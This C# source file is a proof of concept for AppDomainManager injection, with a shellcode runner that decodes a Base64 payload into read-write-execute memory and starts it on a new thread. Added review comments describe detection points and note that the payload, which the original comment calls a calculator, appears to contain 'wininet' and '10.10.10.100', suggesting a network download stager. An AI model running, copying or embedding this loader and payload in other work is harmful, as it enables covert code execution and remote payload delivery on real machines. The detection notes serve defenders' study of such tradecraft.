using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;

/// <summary>
/// Proof-of-concept custom <see cref="AppDomainManager"/>. The override below runs
/// when a new application domain is initialized and only shows a message box.
/// </summary>
/// <remarks>
/// How this type gets registered with a host process is not shown in this file.
/// NOTE(review): for detection, the usual registration points are the
/// appDomainManagerAssembly / appDomainManagerType elements of an application
/// .config file and the APPDOMAIN_MANAGER_ASM / APPDOMAIN_MANAGER_TYPE environment
/// variables. An unexpected value in any of them on a signed .NET host is worth alerting on.
/// </remarks>
public sealed class MyAppDomainManager : AppDomainManager
{
    /// <summary>
    /// Domain-initialization hook. Here it displays a message box and returns.
    /// The call into <see cref="ClassExample.Execute"/> is commented out.
    /// </summary>
    /// <param name="appDomainInfo">Setup information for the new domain (unused here).</param>
    public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
    {
        System.Windows.Forms.MessageBox.Show("AppDomain - KaBoomBeacon!");
        // You have more control here than I am demonstrating. For example, you can set ApplicationBase,
        // Or you can Override the Assembly Resolver, etc...
        // If you want, execute shellcode or whatever.
        //bool res = ClassExample.Execute();
        return;
    }
}

/// <summary>
/// In-process native code runner: decodes an embedded Base64 blob, copies it into
/// newly allocated memory and starts a thread at that address.
/// </summary>
public class ClassExample
{
    // The two literals passed to VirtualAlloc in Execute() match these commented-out names.
    //private static UInt32 MEM_COMMIT = 0x1000;
    //private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

    // P/Invoke declarations for the three kernel32 functions used by Execute().
    // NOTE(review): pointer-typed native parameters are declared as UInt32 here.
    // Execute() only ever passes 0 for them.
    [DllImport("kernel32")]
    private static extern IntPtr VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

    [DllImport("kernel32")]
    private static extern IntPtr CreateThread(
        UInt32 lpThreadAttributes,
        UInt32 dwStackSize,
        IntPtr lpStartAddress,
        IntPtr param,
        UInt32 dwCreationFlags,
        ref UInt32 lpThreadId
    );

    [DllImport("kernel32")]
    private static extern UInt32 WaitForSingleObject(
        IntPtr hHandle,
        UInt32 dwMilliseconds
    );

    /// <summary>
    /// Decodes the embedded payload, places it in memory allocated with
    /// flags 0x1000 / 0x40, runs it on a new thread and waits for that thread.
    /// </summary>
    /// <returns>Always <c>true</c>. No native return value is checked.</returns>
    public static bool Execute()
    {
        // Its calc, I think ;-)
        // NOTE(review): the comment above does not match the data. The decoded bytes
        // contain the ASCII strings "wininet" and "10.10.10.100", which points to a
        // network download stager rather than a calculator launcher. Confirm by
        // disassembly and treat this as a network stager when triaging.
        byte[] installercode = 
System.Convert.FromBase64String("/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11IMdtTSb53aW5pbmV0AEFWSInhScfCTHcmB//VU1NIieFTWk0xwE0xyVNTSbo6VnmnAAAAAP/V6A0AAAAxMC4xMC4xMC4xMDAAWkiJwUnHwPsgAABNMclTU2oDU0m6V4mfxgAAAAD/1ehHAAAAL3pqckU2QVh2TFh0cUUyc1JORUlLeXd0a3EtSGoyYjhRYVNSNTJCUlVNcjd6VHo2R0ZiX3Q2dTIyU1MyWGp3ZmlaY2RWYgBIicFTWkFYTTHJU0i4ADKghAAAAABQU1NJx8LrVS47/9VIicZqCl9IifFqH1pSaIAzAABJieBqBEFZSbp1Rp6GAAAAAP/VTTHAU1pIifFNMclNMclTU0nHwi0GGHv/1YXAdR9Ix8GIEwAASbpE8DXgAAAAAP/VSP/PdALrquhVAAAAU1lqQFpJidHB4hBJx8AAEAAASbpYpFPlAAAAAP/VSJNTU0iJ50iJ8UiJ2knHwAAgAABJiflJuhKWieIAAAAA/9VIg8QghcB0smaLB0gBw4XAddJYw1hqAFlJx8LwtaJW/9U=");

        // Allocation sized to the payload with protection 0x40 (read/write/execute per the
        // commented-out constant above). A private RWX region in a managed process is a
        // strong signal for memory scanners and EDR.
        IntPtr funcAddr = VirtualAlloc(0, (UInt32)installercode.Length, 0x1000, 0x40);
        // The result of VirtualAlloc is not checked before the copy.
        Marshal.Copy(installercode, 0, (IntPtr)(funcAddr), installercode.Length);
        IntPtr hThread = IntPtr.Zero;
        UInt32 threadId = 0;
        IntPtr pinfo = IntPtr.Zero;

        // The thread start address is the freshly written buffer, not code from a loaded
        // module. That mismatch is what thread-start telemetry can key on.
        hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
        // 0xFFFFFFFF is the INFINITE timeout, so the caller blocks until the thread exits.
        WaitForSingleObject(hThread, 0xFFFFFFFF);
        return true;
    }
}